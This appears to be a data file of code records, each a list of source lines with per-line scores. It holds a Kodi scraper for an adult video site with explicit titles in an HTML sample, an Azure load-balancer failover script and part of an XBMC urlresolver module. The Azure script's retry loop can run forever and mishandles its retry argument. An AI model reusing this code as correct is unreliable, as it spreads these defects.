class=\"add-to-playlist-icon display-none\">\n", " <button type=\"button\" data-title=\"Agregar a una lista de reproducción\" class=\"tooltipTrig open-playlist-link playlist-trigger\" onclick=\"return false;\" data-rel=\"2064578485\" >+</button>\n", " </div>\n", " <div class=\"thumbnail-info-wrapper clearfix\">\n", " <span class=\"title\">\n", " <a href=\"/view_video.php?viewkey=2064578485\" title=\"Glamorous Brunette Gets Fucked Hard On Armchair 2\">Glamorous Brunette Gets Fucked Hard On Armchair 2</a>\n", " </span>\n", " <span class=\"views\"><var>35</var> vistas</span>\n", " <div class=\"rating-container up\">\n", " <div class=\"main-sprite icon\"></div>\n", " <div class=\"value\">100%</div>\n", " </div>\n", " <var class=\"added\">5 hours ago</var>\n", " </div>\n", " </div>\n", " </li>\n", " '''\n", " \n", " # Extrae las peliculas\n", " patron = '<div class=\"phimage\">.*?'\n", " patron += '<a href=\"/view_video.php\\?viewkey=([^\"]+)\" title=\"([^\"]+).*?'\n", " patron += '<var class=\"duration\">([^<]+)</var>(.*?)</div>.*?'\n", " patron += 'data-smallthumb=\"([^\"]+)\"'\n", " \n", " matches = re.compile(patron,re.DOTALL).findall(data)\n", " scrapertools.printMatches(matches)\n", " \n", " for viewkey,scrapedtitle,duration,scrapedhd,thumbnail in matches: \n", " title=scrapedtitle.replace('&amp;','&')+\" (\"+duration+\")\"\n", " scrapedhd = scrapertools.find_single_match(scrapedhd,'<span class=\"hd-thumbnail\">(.*?)</span>')\n", " if (scrapedhd == 'HD') : title += ' [HD]'\n", " url= 'http://es.pornhub.com/embed/' + viewkey\n", " \n", " if (DEBUG): logger.info(\"title=[\"+title+\"], url=[\"+url+\"], thumbnail=[\"+thumbnail+\"]\")\n", " itemlist.append( Item(channel=__channel__, action=\"play\", title=title , url=url ,fanart=__fanart__, thumbnail=thumbnail) )\n", " \n", " # Paginador\n", " patron = '<li class=\"page_next\"><a href=\"([^\"]+)\"'\n", " \n", " matches = re.compile(patron,re.DOTALL).findall(data)\n", " scrapertools.printMatches(matches)\n", " \n", " if 
len(matches)>0:\n", " url=urlparse.urljoin(\"http://es.pornhub.com\",matches[0].replace('&amp;','&'))\n", " itemlist.append( Item(channel=__channel__, action=\"peliculas\", title=\">> Página siguiente\" ,fanart=__fanart__, url=url)) \n", " return itemlist\n", "\n", "\n", "def play(item):\n", " logger.info(\"[pornhub.py] play\")\n", " itemlist=[]\n", " \n", " #item.url='http://es.pornhub.com/embed/' + viewkey\n", " \n", " # Descarga la página\n", " data = get_main_page(item.url)\n", " data = scrapertools.find_single_match(data,'html5Config([^}]+)},')\n", " url = scrapertools.get_match(data,\"src\\s+:\\s+'([^']+)',\")\n", " \n", " #url= \"http://cdn2b.embed.pornhub.phncdn.com/videos/201501/19/37717631/480P_600K_37717631.mp4?rs=200&ri=2500&ip=188.79.24.200&s=1421873759&e=1421880959&h=6cd0058bc8e5abac9ccfdaa50c6bdf19\"\n", " #logger.info(\"url=\"+url)\n", " server=\"Directo\"\n", " itemlist.append( Item(channel=__channel__, title=\"\" , url=url , server=server, folder=False) )\n", "\n", " return itemlist\n", " \n", "\n", "def get_main_page(url):\n", " logger.info(\"[pornhub.py] get_main_page\")\n", "\n", " headers=[]\n", " headers.append([\"User-Agent\",\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:20.0) Gecko/20100101 Firefox/20.0\"])\n", " headers.append([\"Accept\",\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\"])\n", " headers.append([\"Accept-Language\",\"es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3\"])\n", " headers.append([\"Accept-Encoding\",\"gzip, deflate\"])\n", "\n", " # Descarga la página\n", " data = scrapertools.cachePage(url,headers=headers)\n", " #logger.info(\"pelisalacarta.channels.pornhub data=\"+data)\n", "\n", " return data\n" ]
[ 0, 0.016129032258064516, 0, 0, 0, 0.016129032258064516, 0.11764705882352941, 0.06666666666666667, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.022727272727272728, 0, 0, 0, 0.058823529411764705, 0, 0, 0.05, 0, 0, 0.2, 0.02631578947368421, 0.2, 0, 0, 0.020833333333333332, 0.2, 0, 0, 0, 0.006060606060606061, 0, 0, 0, 0, 0, 0, 0, 0.2, 0, 0.03333333333333333, 0, 0, 0, 0.1111111111111111, 0.017543859649122806, 0, 0.2, 0.03278688524590164, 0, 0.016129032258064516, 0, 0.043478260869565216, 0.125, 0.07142857142857142, 0.03333333333333333, 0.058823529411764705, 0.030303030303030304, 0.07692307692307693, 0, 0, 0, 0.047619047619047616, 0, 0, 0.125, 0, 0, 0.01639344262295082, 0.2, 0, 0, 0, 0, 0.004878048780487805, 0, 0, 0, 0, 0.0013774104683195593, 0, 0, 0, 0.004975124378109453, 0, 0, 0, 0.004975124378109453, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.1111111111111111, 0, 0, 0.012987012987012988, 0, 0, 0.2, 0.017543859649122806, 0, 0.2, 0.06493506493506493, 0.030303030303030304, 0.019230769230769232, 0.04, 0.018518518518518517, 0.058823529411764705, 0.021052631578947368, 0.04580152671755725, 0.1111111111111111, 0, 0, 0.2, 0.017543859649122806, 0, 0.2, 0.043478260869565216, 0.046511627906976744, 0.038461538461538464, 0, 0, 0, 0, 0, 0.0625, 0.2, 0.01818181818181818, 0.2, 0, 0, 0.014084507042253521, 0.04838709677419355, 0.2, 0.010416666666666666, 0.034482758620689655, 0.047619047619047616, 0.050505050505050504, 0, 0, 0.2, 0, 0, 0, 0, 0.06666666666666667, 0.01680672268907563, 0.020618556701030927, 0.01282051282051282, 0.017857142857142856, 0, 0, 0.01818181818181818, 0.016129032258064516, 0, 0 ]
173
0.030112
false
#!/usr/bin/python # Setup.. # pip azure from azure.mgmt.common import ( SubscriptionCloudCredentials ) from azure.mgmt.resource import ( ProviderOperations, ResourceGroupListParameters, ResourceGroupOperations, ResourceManagementClient, ResourceIdentity, GenericResource ) from azure.mgmt.network import ( NetworkResourceProviderClient, LoadBalancer, BackendAddressPool, ResourceId ) from azure.mgmt.network.networkresourceprovider import ( NetworkInterface ) from azure.mgmt.compute import ( ComputeManagementClient ) from requests import Request, Session import requests, json, re, os, logging, getopt, sys logging.basicConfig(level=logging.INFO, format='%(asctime)s %(message)s') def load_config(): with open('settings.private.json') as config_file: global config, subscription_id, client_id, client_secret, endpoint config = json.load(config_file) subscription_id = config['subscription_id'] client_id = config['client_id'] client_secret = config['client_secret'] endpoint = config['endpoint'] with open('environment.json') as machine_file: global environment, number_of_machines environment = json.load(machine_file) number_of_machines = len(environment['vmnames']) logging.info('there are %s machines', number_of_machines) def get_token_from_client_credentials(endpoint, client_id, client_secret): payload = { 'grant_type': 'client_credentials', 'client_id': client_id, 'client_secret': client_secret, 'resource': 'https://management.core.windows.net/', } #TODO add back in verify for non-fiddler #NOTE add Verify=False when going via a proxy with fake cert / fiddler response = requests.post(endpoint, data=payload).json() return response['access_token'] def get_virtual_machine(resource_group_name, vm_name): """ :param resource_group_name: str :param vm_name: str :return: azure.mgmt.compute.VirtualMachine """ virtual_machine = compute_client.virtual_machines.get(resource_group_name, vm_name).virtual_machine logging.info('using virtual machine id: %s', virtual_machine.id) return 
virtual_machine def get_network_interface_ip_configuration(resource_group_name, network_interface_name): network_interface = network_client.network_interfaces.get(resource_group_name, network_interface_name) return network_interface #for ipconfig in network_interface.network_interface.ip_configurations: # return ipconfig def get_virtual_machine_network_interface(resource_group_name, virtual_machine_name): virtual_machine = get_virtual_machine(resource_group_name, virtual_machine_name) for profile in virtual_machine.network_profile.network_interfaces: nic_uri = profile.reference_uri #network_interface = get_network_interface(resource_group_name) label = os.path.basename(os.path.normpath(nic_uri)) logging.info('nic on vm to use is: %s', label) network_interface = get_network_interface_ip_configuration(resource_group_name, label) logging.info('nic id is: %s', network_interface.network_interface.id) return network_interface.network_interface def get_master_vmname_from_arg(arg): if arg == '0': rv = { 'newMaster' : environment['vmnames'][0], 'oldMaster' : environment['vmnames'][1] } elif arg == '1': rv = { 'newMaster' : environment['vmnames'][1], 'oldMaster' : environment['vmnames'][0] } else: raise ValueError('Only accept 0 or 1 as New Master value') return rv def build_request(vm_object, nic_object, load_balancer=None): """ :param vm_object : azure.mgmt.compute.VirtualMachine :param nic_object : azure.mgmt.network.networkresourceprovider.NetworkInterface :param load_balancer : azure.mgmt.network.LoadBalancer :return: dict """ if load_balancer == None: backend_pool = [] else: backend_pool = [{ 'id' : load_balancer.load_balancer.backend_address_pools[0].id }] request = { 'properties': { 'virtualMachine' : { 'id' : vm_object.virtual_machine.id }, 'ipConfigurations' : [{ #may have to build by hand 'properties' : { 'loadBalancerBackendAddressPools' : backend_pool, 'subnet' : { 'id' : nic_object.ip_configurations[0].subnet.id } }, 'name' : 
nic_object.ip_configurations[0].name, 'id' : nic_object.ip_configurations[0].id }] }, 'id' : nic_object.id, 'name' : nic_object.name, 'location' : vm_object.virtual_machine.location, 'type' : 'Microsoft.Network/networkInterfaces' } return request def send_loadbalancer_request(payload, resource_id, max_retries=20): endpoint = network_client.base_uri + resource_id + '?api-version=' + network_client.api_version header = { 'Authorization' : 'Bearer ' + auth_token } while (max_retries > 0): session = Session() request = Request('PUT', endpoint, json=payload, headers=header) prepared = session.prepare_request(request) logging.debug('raw body sent') logging.debug(prepared.body) response = session.send(prepared) if (response.status_code == 200): break elif (response.status_code == 429): max_retries = max_retries - 1 logging.warn('retrying an HTTP send due to 429 retryable response') logging.warn('this will be try# %s', max_retries) return response def main(argv): try: opts, args = getopt.getopt(sys.argv[1:], 'n:r:') except getopt.GetoptError: logging.exception('invalid options - switchMaster -newmaster 0|1') # Startup load_config() for opt,arg in opts: if opt in ('-n'): new_master_arg = arg logging.info('newMaster will be %s', new_master_arg) #now get the existing virtual machines vmnames = get_master_vmname_from_arg(new_master_arg) elif opt in ('-r'): max_retries = arg logging.info('max retries set to %s', max_retries) # OAuth token needed global auth_token auth_token = get_token_from_client_credentials(endpoint, client_id, client_secret) # now the Azure management credentials credentials = SubscriptionCloudCredentials(subscription_id, auth_token) # now the specific compute, network resource type clients global compute_client, network_client, resource_client compute_client = ComputeManagementClient(credentials) network_client = NetworkResourceProviderClient(credentials) resource_client = ResourceManagementClient(credentials) #TODO modify this to mach your specific 
settings resource_group = environment['resourceGroup'] load_balancer_name = environment['loadBalancerName'] subnet_name = environment['subnetName']; virtual_network_name = environment['virtualNetworkName']; #TODO - end - only the "above" should need to change. old_master_vm = compute_client.virtual_machines.get(resource_group, vmnames['oldMaster']['name']) new_master_vm = compute_client.virtual_machines.get(resource_group, vmnames['newMaster']['name']) #get the subnet we are in subnet = network_client.subnets.get(resource_group, virtual_network_name, subnet_name) #the load balancer load_balancer = network_client.load_balancers.get(resource_group, load_balancer_name) #get the 2 nic cards for the VM's in this subnet/loadbalncer config new_master_nic = get_virtual_machine_network_interface(resource_group, vmnames['newMaster']['name']) old_master_nic = get_virtual_machine_network_interface(resource_group, vmnames['oldMaster']['name']) old_master_request = build_request(old_master_vm, old_master_nic) new_master_request = build_request(new_master_vm, new_master_nic, load_balancer) send_loadbalancer_request(old_master_request, old_master_nic.id, max_retries) #make sure to add in the backendpool send_loadbalancer_request(new_master_request, new_master_nic.id, max_retries) if __name__ == "__main__": main(sys.argv[1:])
[ "#!/usr/bin/python\n", "\n", "# Setup..\n", "\n", "# pip azure\n", "from azure.mgmt.common import ( \n", " SubscriptionCloudCredentials\n", ")\n", "\n", "from azure.mgmt.resource import (\n", " ProviderOperations,\n", " ResourceGroupListParameters,\n", " ResourceGroupOperations,\n", " ResourceManagementClient,\n", " ResourceIdentity,\n", " GenericResource\n", ")\n", "\n", "from azure.mgmt.network import (\n", " NetworkResourceProviderClient,\n", " LoadBalancer,\n", " BackendAddressPool,\n", " ResourceId\n", ")\n", "\n", "from azure.mgmt.network.networkresourceprovider import (\n", " NetworkInterface\n", ")\n", "\n", "from azure.mgmt.compute import (\n", " ComputeManagementClient\n", ")\n", "\n", "from requests import Request, Session\n", "\n", "import requests, json, re, os, logging, getopt, sys\n", "\n", "\n", "logging.basicConfig(level=logging.INFO, format='%(asctime)s %(message)s')\n", "\n", "def load_config():\n", " with open('settings.private.json') as config_file:\n", " global config, subscription_id, client_id, client_secret, endpoint\n", " config = json.load(config_file)\n", " subscription_id = config['subscription_id']\n", " client_id = config['client_id']\n", " client_secret = config['client_secret']\n", " endpoint = config['endpoint']\n", "\n", " with open('environment.json') as machine_file:\n", " global environment, number_of_machines\n", " environment = json.load(machine_file)\n", " number_of_machines = len(environment['vmnames'])\n", " logging.info('there are %s machines', number_of_machines)\n", "\n", "\n", "def get_token_from_client_credentials(endpoint, client_id, client_secret):\n", " payload = {\n", " 'grant_type': 'client_credentials',\n", " 'client_id': client_id,\n", " 'client_secret': client_secret,\n", " 'resource': 'https://management.core.windows.net/',\n", " }\n", " #TODO add back in verify for non-fiddler\n", " #NOTE add Verify=False when going via a proxy with fake cert / fiddler\n", " response = requests.post(endpoint, 
data=payload).json()\n", " return response['access_token']\n", "\n", "def get_virtual_machine(resource_group_name, vm_name):\n", " \"\"\"\n", " :param resource_group_name: str\n", " :param vm_name: str\n", " :return: azure.mgmt.compute.VirtualMachine\n", " \"\"\"\n", " virtual_machine = compute_client.virtual_machines.get(resource_group_name, vm_name).virtual_machine\n", " logging.info('using virtual machine id: %s', virtual_machine.id)\n", " return virtual_machine\n", "\n", "def get_network_interface_ip_configuration(resource_group_name, network_interface_name):\n", " network_interface = network_client.network_interfaces.get(resource_group_name, network_interface_name)\n", " return network_interface\n", " #for ipconfig in network_interface.network_interface.ip_configurations:\n", " # return ipconfig\n", "\n", "def get_virtual_machine_network_interface(resource_group_name, virtual_machine_name):\n", " virtual_machine = get_virtual_machine(resource_group_name, virtual_machine_name)\n", " for profile in virtual_machine.network_profile.network_interfaces:\n", " nic_uri = profile.reference_uri\n", "\n", " #network_interface = get_network_interface(resource_group_name)\n", " label = os.path.basename(os.path.normpath(nic_uri))\n", " logging.info('nic on vm to use is: %s', label)\n", "\n", " network_interface = get_network_interface_ip_configuration(resource_group_name, label)\n", " logging.info('nic id is: %s', network_interface.network_interface.id)\n", " return network_interface.network_interface\n", "\n", "def get_master_vmname_from_arg(arg):\n", " if arg == '0':\n", " rv = { \n", " 'newMaster' : environment['vmnames'][0],\n", " 'oldMaster' : environment['vmnames'][1] \n", " }\n", " elif arg == '1':\n", " rv = { \n", " 'newMaster' : environment['vmnames'][1],\n", " 'oldMaster' : environment['vmnames'][0] \n", " }\n", " else:\n", " raise ValueError('Only accept 0 or 1 as New Master value')\n", "\n", " return rv\n", "\n", "def build_request(vm_object, nic_object, 
load_balancer=None):\n", " \"\"\"\n", " :param vm_object : azure.mgmt.compute.VirtualMachine\n", " :param nic_object : azure.mgmt.network.networkresourceprovider.NetworkInterface\n", " :param load_balancer : azure.mgmt.network.LoadBalancer\n", " :return: dict\n", " \"\"\"\n", " if load_balancer == None:\n", " backend_pool = []\n", " else:\n", " backend_pool = [{ 'id' : load_balancer.load_balancer.backend_address_pools[0].id }]\n", "\n", " request = {\n", " 'properties': {\n", " 'virtualMachine' : {\n", " 'id' : vm_object.virtual_machine.id\n", " },\n", " 'ipConfigurations' : [{ #may have to build by hand\n", " 'properties' : {\n", " 'loadBalancerBackendAddressPools' : backend_pool,\n", " 'subnet' : {\n", " 'id' : nic_object.ip_configurations[0].subnet.id\n", " }\n", " },\n", " 'name' : nic_object.ip_configurations[0].name,\n", " 'id' : nic_object.ip_configurations[0].id\n", " }]\n", " },\n", " 'id' : nic_object.id,\n", " 'name' : nic_object.name,\n", " 'location' : vm_object.virtual_machine.location,\n", " 'type' : 'Microsoft.Network/networkInterfaces'\n", " }\n", "\n", "\n", " return request\n", "\n", "def send_loadbalancer_request(payload, resource_id, max_retries=20):\n", " endpoint = network_client.base_uri + resource_id + '?api-version=' + network_client.api_version\n", "\n", " header = { 'Authorization' : 'Bearer ' + auth_token }\n", " \n", " while (max_retries > 0):\n", " session = Session()\n", " request = Request('PUT', endpoint, json=payload, headers=header)\n", " prepared = session.prepare_request(request)\n", "\n", " logging.debug('raw body sent')\n", " logging.debug(prepared.body)\n", "\n", " response = session.send(prepared)\n", " if (response.status_code == 200):\n", " break\n", " elif (response.status_code == 429):\n", " max_retries = max_retries - 1\n", " logging.warn('retrying an HTTP send due to 429 retryable response')\n", " logging.warn('this will be try# %s', max_retries)\n", " \n", " return response\n", "\n", "\n", "def main(argv):\n", " 
try:\n", " opts, args = getopt.getopt(sys.argv[1:], 'n:r:')\n", " except getopt.GetoptError:\n", " logging.exception('invalid options - switchMaster -newmaster 0|1')\n", "\n", " # Startup\n", " load_config()\n", "\n", " for opt,arg in opts:\n", " if opt in ('-n'):\n", " new_master_arg = arg\n", " logging.info('newMaster will be %s', new_master_arg) \n", " #now get the existing virtual machines\n", " vmnames = get_master_vmname_from_arg(new_master_arg)\n", " elif opt in ('-r'):\n", " max_retries = arg\n", " logging.info('max retries set to %s', max_retries)\n", "\n", "\n", " # OAuth token needed\n", " global auth_token\n", " auth_token = get_token_from_client_credentials(endpoint, client_id, client_secret)\n", "\n", " # now the Azure management credentials\n", " credentials = SubscriptionCloudCredentials(subscription_id, auth_token)\n", "\n", " # now the specific compute, network resource type clients\n", " global compute_client, network_client, resource_client\n", " compute_client = ComputeManagementClient(credentials)\n", " network_client = NetworkResourceProviderClient(credentials)\n", " resource_client = ResourceManagementClient(credentials)\n", "\n", " #TODO modify this to mach your specific settings\n", " resource_group = environment['resourceGroup']\n", " load_balancer_name = environment['loadBalancerName']\n", " \n", " subnet_name = environment['subnetName'];\n", " virtual_network_name = environment['virtualNetworkName'];\n", "\n", " #TODO - end - only the \"above\" should need to change.\n", "\n", " old_master_vm = compute_client.virtual_machines.get(resource_group, vmnames['oldMaster']['name'])\n", " new_master_vm = compute_client.virtual_machines.get(resource_group, vmnames['newMaster']['name'])\n", "\n", " #get the subnet we are in\n", " subnet = network_client.subnets.get(resource_group, virtual_network_name, subnet_name)\n", "\n", " #the load balancer\n", " load_balancer = network_client.load_balancers.get(resource_group, load_balancer_name)\n", "\n", 
" #get the 2 nic cards for the VM's in this subnet/loadbalncer config\n", " new_master_nic = get_virtual_machine_network_interface(resource_group, vmnames['newMaster']['name'])\n", " old_master_nic = get_virtual_machine_network_interface(resource_group, vmnames['oldMaster']['name'])\n", "\n", "\n", " old_master_request = build_request(old_master_vm, old_master_nic)\n", " new_master_request = build_request(new_master_vm, new_master_nic, load_balancer)\n", "\n", "\n", " send_loadbalancer_request(old_master_request, old_master_nic.id, max_retries)\n", "\n", " #make sure to add in the backendpool\n", " send_loadbalancer_request(new_master_request, new_master_nic.id, max_retries)\n", "\n", "\n", "if __name__ == \"__main__\":\n", " main(sys.argv[1:])\n", "\n" ]
[ 0, 0, 0, 0, 0, 0.030303030303030304, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.019230769230769232, 0, 0, 0, 0, 0.05263157894736842, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.022222222222222223, 0.013333333333333334, 0, 0, 0, 0.01818181818181818, 0, 0, 0, 0, 0, 0.009615384615384616, 0, 0, 0, 0.02247191011235955, 0.009345794392523364, 0, 0.013157894736842105, 0, 0, 0.023255813953488372, 0.011764705882352941, 0, 0, 0, 0.014705882352941176, 0, 0, 0, 0.01098901098901099, 0, 0, 0, 0.02702702702702703, 0, 0.0625, 0.018867924528301886, 0.03773584905660377, 0, 0, 0.0625, 0.018867924528301886, 0.03773584905660377, 0, 0, 0, 0, 0, 0, 0.016129032258064516, 0, 0, 0.011904761904761904, 0, 0, 0, 0.03333333333333333, 0, 0, 0.043478260869565216, 0, 0, 0, 0.030303030303030304, 0.019230769230769232, 0, 0.047619047619047616, 0.030303030303030304, 0.014285714285714285, 0.030303030303030304, 0.013513513513513514, 0, 0, 0.015873015873015872, 0.017241379310344827, 0, 0, 0.03333333333333333, 0.029411764705882353, 0.017543859649122806, 0.01818181818181818, 0, 0, 0, 0.05263157894736842, 0, 0.014492753623188406, 0.01, 0, 0.05172413793103448, 0.2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.04, 0, 0, 0.012987012987012988, 0.0196078431372549, 0, 0, 0, 0, 0, 0, 0.04, 0, 0.011494252873563218, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.018867924528301886, 0, 0, 0.2, 0.022222222222222223, 0.016129032258064516, 0, 0.017241379310344827, 0, 0.00980392156862745, 0.00980392156862745, 0, 0.03333333333333333, 0.01098901098901099, 0, 0.043478260869565216, 0.011111111111111112, 0, 0.013888888888888888, 0.009523809523809525, 0.009523809523809525, 0, 0, 0.014285714285714285, 0.011764705882352941, 0, 0, 0.024390243902439025, 0, 0.024390243902439025, 0.012195121951219513, 0, 0, 0, 0.045454545454545456, 1 ]
243
0.013044
false
# urlresolver XBMC Addon # Copyright (C) 2011 t0mm0 # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. ''' This module provides the main API for accessing the urlresolver features. For most cases you probably want to use :func:`urlresolver.resolve` or :func:`urlresolver.choose_source`. .. seealso:: :class:`HostedMediaFile` ''' import os import common import plugnplay from types import HostedMediaFile from types import URLWithEpisodes from .plugnplay.interfaces import UrlResolver from .plugnplay.interfaces import EpisodeResolver from .plugnplay.interfaces import PluginSettings from .plugnplay.interfaces import SiteAuth import xbmcgui import xbmcaddon #load all available plugins plugnplay.set_plugin_dirs(common.plugins_path) plugnplay.load_plugins() def resolve(web_url): ''' Resolve a web page to a media stream. It is usually as simple as:: import urlresolver media_url = urlresolver.resolve(web_url) where ``web_url`` is the address of a web page which is associated with a media file and ``media_url`` is the direct URL to the media. Behind the scenes, :mod:`urlresolver` will check each of the available resolver plugins to see if they accept the ``web_url`` in priority order (lowest priotity number first). When it finds a plugin willing to resolve the URL, it passes the ``web_url`` to the plugin and returns the direct URL to the media file, or ``False`` if it was not possible to resolve. .. 
seealso:: :class:`HostedMediaFile` Args: web_url (str): A URL to a web page associated with a piece of media content. Returns: If the ``web_url`` could be resolved, a string containing the direct URL to the media file, if not, returns ``False``. ''' source = HostedMediaFile(url=web_url) return source.resolve() def filter_source_list(source_list): ''' Takes a list of :class:`HostedMediaFile`s representing web pages that are thought to be associated with media content. If no resolver plugins exist to resolve a :class:`HostedMediaFile` to a link to a media file it is removed from the list. Args: urls (list of :class:`HostedMediaFile`): A list of :class:`HostedMediaFiles` representing web pages that are thought to be associated with media content. Returns: The same list of :class:`HostedMediaFile` but with any that can't be resolved by a resolver plugin removed. ''' return [source for source in source_list if source] def choose_source(sources): ''' Given a list of :class:`HostedMediaFile` representing web pages that are thought to be associated with media content this function checks which are playable and if there are more than one it pops up a dialog box displaying the choices. Example:: sources = [HostedMediaFile(url='http://youtu.be/VIDEOID', title='Youtube [verified] (20 views)'), HostedMediaFile(url='http://putlocker.com/file/VIDEOID', title='Putlocker (3 views)')] source = urlresolver.choose_source(sources) if source: stream_url = source.resolve() addon.resolve_url(stream_url) else: addon.resolve_url(False) Args: sources (list): A list of :class:`HostedMediaFile` representing web pages that are thought to be associated with media content. Returns: The chosen :class:`HostedMediaFile` or ``False`` if the dialog is cancelled or none of the :class:`HostedMediaFile` are resolvable. 
''' #get rid of sources with no resolver plugin sources = filter_source_list(sources) #show dialog to choose source if len(sources) > 1: dialog = xbmcgui.Dialog() titles = [] for source in sources: titles.append(source.title) index = dialog.select('Choose your stream', titles) if index > -1: return sources[index] else: return False #only one playable source so just play it elif len(sources) == 1: return sources[0] #no playable sources available else: common.addon.log_error('no playable streams found') return False def get_res_setting(): value = common.addon.get_setting('%s_%s' % ("ResolutionSetting", "quality")) if value == "0": dialog = xbmcgui.Dialog() titles = [u'每次询问', u'320P(流畅):适合非常非常慢的网速', u'480P(高清):适合一般宽带上网的网速4M左右', u'720P(超清):适合比较快的光纤或者小区宽带10M左右', u'1080P(蓝光):需要极高的网速即使40M以上也不保证能正常播放'] index = dialog.select('选择适合你网络环境的清晰度', titles) if index != -1: xbmcaddon.Addon(id='script.module.urlresolvercn').setSetting('%s_%s' % ("ResolutionSetting", "quality"),str(index)) return index else: return False else: return int(value) def display_settings(): ''' Opens the settings dialog for :mod:`urlresolver` and its plugins. This can be called from your addon to provide access to global :mod:`urlresolver` settings. Each resolver plugin is also capable of exposing settings. .. note:: All changes made to these setting by the user are global and will affect any addon that uses :mod:`urlresolver` and its plugins. ''' _update_settings_xml() common.addon.show_settings() def _update_settings_xml(): ''' This function writes a new ``resources/settings.xml`` file which contains all settings for this addon and its plugins. 
''' try: try: os.makedirs(os.path.dirname(common.settings_file)) except OSError: pass f = open(common.settings_file, 'w') try: f.write('<?xml version="1.0" encoding="utf-8" standalone="yes"?>\n') f.write('<settings>\n') for imp in PluginSettings.implementors(): f.write('<category label="%s">\n' % imp.name) f.write(imp.get_settings_xml()) f.write('</category>\n') f.write('</settings>') finally: f.close except IOError: common.addon.log_error('error writing ' + common.settings_file) #make sure settings.xml is up to date _update_settings_xml()
[ "# urlresolver XBMC Addon\n", "# Copyright (C) 2011 t0mm0\n", "#\n", "# This program is free software: you can redistribute it and/or modify\n", "# it under the terms of the GNU General Public License as published by\n", "# the Free Software Foundation, either version 3 of the License, or\n", "# (at your option) any later version.\n", "#\n", "# This program is distributed in the hope that it will be useful,\n", "# but WITHOUT ANY WARRANTY; without even the implied warranty of\n", "# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n", "# GNU General Public License for more details.\n", "#\n", "# You should have received a copy of the GNU General Public License\n", "# along with this program. If not, see <http://www.gnu.org/licenses/>.\n", "\n", "'''\n", "This module provides the main API for accessing the urlresolver features.\n", "\n", "For most cases you probably want to use :func:`urlresolver.resolve` or \n", ":func:`urlresolver.choose_source`.\n", "\n", ".. seealso::\n", "\t\n", "\t:class:`HostedMediaFile`\n", "\n", "\n", "'''\n", "\n", "import os\n", "import common\n", "import plugnplay\n", "from types import HostedMediaFile\n", "from types import URLWithEpisodes\n", "from .plugnplay.interfaces import UrlResolver\n", "from .plugnplay.interfaces import EpisodeResolver\n", "from .plugnplay.interfaces import PluginSettings\n", "from .plugnplay.interfaces import SiteAuth\n", "import xbmcgui\n", "import xbmcaddon\n", "\n", "#load all available plugins\n", "plugnplay.set_plugin_dirs(common.plugins_path)\n", "plugnplay.load_plugins()\n", "\n", "def resolve(web_url):\n", " '''\n", " Resolve a web page to a media stream.\n", " \n", " It is usually as simple as::\n", " \n", " import urlresolver\n", " media_url = urlresolver.resolve(web_url) \n", " \n", " where ``web_url`` is the address of a web page which is associated with a \n", " media file and ``media_url`` is the direct URL to the media. 
\n", "\n", " Behind the scenes, :mod:`urlresolver` will check each of the available \n", " resolver plugins to see if they accept the ``web_url`` in priority order \n", " (lowest priotity number first). When it finds a plugin willing to resolve \n", " the URL, it passes the ``web_url`` to the plugin and returns the direct URL \n", " to the media file, or ``False`` if it was not possible to resolve.\n", " \n", "\t.. seealso::\n", "\t\t\n", "\t\t:class:`HostedMediaFile`\n", "\n", " Args:\n", " web_url (str): A URL to a web page associated with a piece of media\n", " content.\n", " \n", " Returns:\n", " If the ``web_url`` could be resolved, a string containing the direct \n", " URL to the media file, if not, returns ``False``. \n", " '''\n", " source = HostedMediaFile(url=web_url)\n", " return source.resolve()\n", "\n", " \n", " \n", "def filter_source_list(source_list):\n", " '''\n", " Takes a list of :class:`HostedMediaFile`s representing web pages that are \n", " thought to be associated with media content. 
If no resolver plugins exist \n", " to resolve a :class:`HostedMediaFile` to a link to a media file it is \n", " removed from the list.\n", " \n", " Args:\n", " urls (list of :class:`HostedMediaFile`): A list of \n", " :class:`HostedMediaFiles` representing web pages that are thought to be \n", " associated with media content.\n", " \n", " Returns:\n", " The same list of :class:`HostedMediaFile` but with any that can't be \n", " resolved by a resolver plugin removed.\n", " \n", " '''\n", " return [source for source in source_list if source]\n", "\n", "\n", "def choose_source(sources):\n", " '''\n", " Given a list of :class:`HostedMediaFile` representing web pages that are \n", " thought to be associated with media content this function checks which are \n", " playable and if there are more than one it pops up a dialog box displaying \n", " the choices.\n", " \n", " Example::\n", " \n", " sources = [HostedMediaFile(url='http://youtu.be/VIDEOID', title='Youtube [verified] (20 views)'),\n", " HostedMediaFile(url='http://putlocker.com/file/VIDEOID', title='Putlocker (3 views)')]\n", "\t\tsource = urlresolver.choose_source(sources)\n", "\t\tif source:\n", "\t\t\tstream_url = source.resolve()\n", "\t\t\taddon.resolve_url(stream_url)\n", "\t\telse:\n", "\t\t\taddon.resolve_url(False)\n", "\n", " Args:\n", " sources (list): A list of :class:`HostedMediaFile` representing web \n", " pages that are thought to be associated with media content.\n", " \n", " Returns:\n", " The chosen :class:`HostedMediaFile` or ``False`` if the dialog is \n", " cancelled or none of the :class:`HostedMediaFile` are resolvable. 
